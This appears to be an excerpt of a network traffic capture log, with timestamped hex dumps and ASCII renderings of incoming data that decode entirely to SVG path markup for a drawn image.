                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12108INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12124INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                          Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12140INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12156INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                          Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12172INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12188INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12204INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12220INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC12236INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13020INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                          Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13036INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13052INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13068INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                          Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13084INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13100INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                          Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13116INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13132INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
